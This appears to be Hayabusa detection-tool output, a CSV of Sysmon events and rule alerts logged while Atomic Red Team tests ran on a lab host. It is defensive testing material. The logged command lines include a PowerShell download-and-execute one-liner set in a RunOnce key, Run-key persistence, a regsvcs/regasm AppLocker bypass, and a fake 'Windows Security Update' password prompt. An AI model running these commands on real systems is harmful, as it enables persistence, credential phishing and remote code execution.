+2019-07-19 23:44:53.349 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f"" | LID: 0x50951 | PID: 2912 | PGUID: 747F3D96-D765-5D31-0000-001022C02800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:53.371 +09:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,Persistence - via Run key | DeleteValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Software\Microsoft\Windows\CurrentVersion\Run\Atomic Red Team | Process: C:\Windows\system32\reg.exe | PID: 2912 | PGUID: 747F3D96-D765-5D31-0000-001022C02800,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:53.402 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4264 | PGUID: 747F3D96-D765-5D31-0000-001024C32800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:06.075 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "" C:\Path\AtomicRedTeam.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3216 | PGUID: 747F3D96-D772-5D31-0000-0010BEE52800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:06.075 +09:00,MSEDGEWIN10,1,medium,Persis,Reg Add RUN Key,,rules/sigma/process_creation/proc_creation_win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d C:\Path\AtomicRedTeam.dll | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "" C:\Path\AtomicRedTeam.dll | LID: 0x50951 | PID: 3772 | PGUID: 747F3D96-D772-5D31-0000-001010E82800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,medium,Persis,Reg Add RUN Key,,rules/sigma/process_creation/proc_creation_win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,medium,Persis,Direct Autorun Keys Modification,,rules/sigma/process_creation/proc_creation_win_susp_direct_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:06.161 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - via Run key | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend\1: C:\Path\AtomicRedTeam.dll | Process: C:\Windows\system32\reg.exe | PID: 3772 | PGUID: 747F3D96-D772-5D31-0000-001010E82800,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:06.196 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6472 | PGUID: 747F3D96-D772-5D31-0000-001031EB2800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:06.213 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f"" | LID: 0x50951 | PID: 6120 | PGUID: 747F3D96-D772-5D31-0000-001083ED2800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:06.240 +09:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,Persistence - via Run key | DeleteValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend\1 | Process: C:\Windows\system32\reg.exe | PID: 6120 | PGUID: 747F3D96-D772-5D31-0000-001083ED2800,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:06.267 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 324 | PGUID: 747F3D96-D772-5D31-0000-00107CF02800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:19.483 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - via Run key | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\NextRun: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString(`""https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`"")"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:19.483 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:24.234 +09:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,Persistence - via Run key | DeleteValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\NextRun | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:31.287 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Notepad.lnk | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:31.287 +09:00,MSEDGEWIN10,11,low,Persis,Startup Folder File Write,,rules/sigma/file_event/sysmon_startup_folder_file_write.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:31.287 +09:00,MSEDGEWIN10,11,high,,PowerShell Writing Startup Shortcuts,,rules/sigma/file_event/sysmon_powershell_startup_shortcuts.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:55.034 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6748 | PGUID: 747F3D96-D7A3-5D31-0000-0010A0A22900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:55.105 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs"" | LID: 0x50951 | PID: 4784 | PGUID: 747F3D96-D7A3-5D31-0000-0010F2A42900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:55.621 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Users\IEUser\AppData\Local\Temp\RESBED6.tmp"" ""c:\AtomicRedTeam\CSC5779B24A646D409A951966A058ABC4E3.TMP"" | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs | LID: 0x50951 | PID: 6344 | PGUID: 747F3D96-D7A3-5D31-0000-001035B02900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:55.681 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5800 | PGUID: 747F3D96-D7A3-5D31-0000-001081B22900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:55.681 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:55.699 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll"" | LID: 0x50951 | PID: 6176 | PGUID: 747F3D96-D7A3-5D31-0000-0010D2B42900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:55.699 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:56.033 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""del T1121.dll"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6804 | PGUID: 747F3D96-D7A4-5D31-0000-0010C9C22900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:56.069 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4080 | PGUID: 747F3D96-D7A4-5D31-0000-001020C62900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:46:19.052 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2056 | PGUID: 747F3D96-D7BB-5D31-0000-0010E7FE2900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:46:19.443 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Users\IEUser\AppData\Local\Temp\RES1BEA.tmp"" ""c:\AtomicRedTeam\CSC8EBD65DB33242A1BAD76494F485AF42.TMP"" | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs | LID: 0x50951 | PID: 4124 | PGUID: 747F3D96-D7BB-5D31-0000-00108F082A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:46:19.484 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"" T1121.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:46:19.484 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:46:20.767 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\(Default): mscoree.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:46:20.775 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\ThreadingModel: Both | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:46:20.787 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\Class: regsvcser.Bypass | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:46:20.802 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\Assembly: T1121, Version=0.0.0.0, Culture=neutral, PublicKeyToken=cb1364609f40a1dc | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:46:20.817 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\RuntimeVersion: v4.0.30319 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:46:20.824 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\CodeBase: file:///C:/AtomicRedTeam/T1121.DLL | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:46:20.830 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\0.0.0.0\Class: regsvcser.Bypass | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:46:20.841 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\0.0.0.0\Assembly: T1121, Version=0.0.0.0, Culture=neutral, PublicKeyToken=cb1364609f40a1dc | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:46:20.849 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\0.0.0.0\RuntimeVersion: v4.0.30319 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:46:20.858 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\0.0.0.0\CodeBase: file:///C:/AtomicRedTeam/T1121.DLL | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:46:51.883 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4256 | PGUID: 747F3D96-D7DB-5D31-0000-001089A52A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:46:51.957 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;} | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}"" | LID: 0x50951 | PID: 4452 | PGUID: 747F3D96-D7DB-5D31-0000-0010B5A82A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:46:51.957 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:21.972 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence or CredAccess - Lsa NotificationPackge | SetValue: HKLM\System\CurrentControlSet\Control\Lsa\Notification Packages: Binary Data | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:21.972 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentControlSet Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentcontrolset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:37.096 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3968 | PGUID: 747F3D96-D809-5D31-0000-00100A242B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
